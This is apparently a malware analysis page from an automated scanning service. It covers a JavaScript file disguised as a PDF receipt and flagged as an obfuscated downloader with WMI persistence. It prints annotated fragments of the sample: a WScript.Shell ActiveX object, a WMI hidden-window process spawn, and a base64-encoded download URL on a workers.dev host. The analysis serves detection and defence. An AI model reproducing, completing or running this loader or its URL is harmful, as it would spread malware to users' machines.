Open-source atomic malware analysis

Analyze another

0cba92b12fc0900295d393fdef0be08d9f05e0f154f16851de0ef596fd12f06f

JAVASCRIPT
Verdict: HOSTILE
AI Obfuscated JS downloader with WMI persistence
Mal-ecule
O₂(XeAs)H₄(Os₄Cm₃DbPo₃)Md₂
Size 41.2 KB download
First seen 12 hours ago
Analyzed 6 hours ago
Source malshare.com
Also detected by 2 sources
Obfuscated WMI startup creates hidden process: pdf_Receipt_20260803_1437.js:0x9132
WMI process startup instance hides its window: pdf_Receipt_20260803_1437.js:0x9913
WMI hidden process startup: pdf_Receipt_20260803_1437.js:0x9132
pdf_Receipt_20260803_1437.js javascript
1 try {
2 for (var morphotypes = 0; morphotypes < 1; morphotypes++) { this.witts = this.witts + "؇៍»ⱖȼ⊥܌ઐⷓംईⰢခᬵ҇"; }
3
4 for (var morphotypes = 0; morphotypes < 1; morphotypes++) { this.witts = this.witts + "؇៍»ⱖȼ⊥܌ઐⷓംईⰢခᬵ҇"; }
5
6 var morphotypes =
19:115 ���ȼ��܌��ⷓ����Ⱒခ��҇"; }
20
21 var proteinaceous = new ActiveXObject("WScript.Shell"); ActiveXObject constructor reference
22 if (this.witts || this.witts === "؇៍»ⱖȼ⊥܌ઐⷓംईⰢခᬵ҇") { this.witts = this.witts + "؇៍»ⱖȼ⊥܌ઐⷓംईⰢခᬵ҇"; }
23
24 var sacramentality = proteinaceous.Environment("User");
25 for (var morphotypes = 0; morphotypes < 1; morphotypes++) { this.witts = this.witts + "؇៍»ⱖȼ⊥܌ઐⷓംईⰢခᬵ҇"; }
26
27 var teaware = "";
28 var morphotypes = this.witts || "؇៍»ⱖȼ⊥܌ઐⷓ
30:3199 �������Ⱒခ��҇g�៍»��ȼ��܌��ⷓ����Ⱒခ��҇('aAB0AHQAcABzADoALwAvAHMAdwBlAGUAdAAtAHMAbgBvAHcAZgBsAGEAawBlAC0AOABhADcAZQAuAHUAcABsAG8AYQBkAGUAcwBjAGwAaQBuAHQAZQBzAHMAcwAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAEkAQgBDAHcAcwA=')); \r\n";
31 if (this.witts || this.witts
121:41 »ⱖȼ⊥܌ઐⷓईⰢခᬵ҇"; } catch(e) { this.witts = "؇៍»ⱖȼ⊥܌ઐⷓईⰢခᬵ҇"; }
122
123 var Euless = GetObject(teawaredearresting); Obfuscated WMI startup creates hidden process
124 try { this.witts = this.witts + "؇៍»ⱖȼ⊥܌ઐⷓംईⰢခᬵ҇"; } catch(e) { this.witts = "؇៍»ⱖȼ⊥܌ઐⷓംईⰢခᬵ҇"; }
125
126 var Alife = "؇៍»ⱖȼ⊥܌ઐⷓईⰢခᬵ҇W؇៍»ⱖȼ⊥܌ઐⷓ
142:44 ; morphotypes++) { this.witts = this.witts + "؇៍»ⱖȼ⊥܌ઐⷓംईⰢခᬵ҇"; }
143
144 var bloodsucker = galactacrasia.SpawnInstance_(); Obfuscated WMI startup creates hidden process
145 for (var morphotypes = 0; morphotypes < 1; morphotypes++) { this.witts = this.witts + "؇៍»ⱖȼ⊥܌ઐⷓംईⰢခᬵ҇"; }
146
147 bloodsucker.ShowWindow = 0; WMI hidden process startup
148 var vileyns = "؇៍»ⱖȼ⊥܌ઐⷓईⰢခᬵ҇Wi؇៍»ⱖȼ⊥܌ઐⷓईⰢခᬵ҇n؇៍»ⱖȼ⊥܌ઐⷓईⰢခᬵ҇3؇៍»ⱖȼ⊥܌ઐⷓईⰢခᬵ҇2؇៍�

Loading traits…

Identity

SHA-256 0cba92b12fc0900295d393fdef0be08d9f05e0f154f16851de0ef596fd12f06f
Filename pdf_Receipt_20260803_1437.js
Package 0cba92b12fc0900295d393fdef0be08d9f05e0f154f16851de0ef596fd12f06f

Origin

Source harvest
Feed malshare
Domain malshare.com

Timeline

First seen 5 Aug 2026 17:31 UTC
First analyzed 5 Aug 2026 23:52 UTC
Last analyzed 5 Aug 2026 23:52 UTC
Last updated 5 Aug 2026 23:52 UTC

Labeling

Label bad
Label source harvest
Traits version b5ca8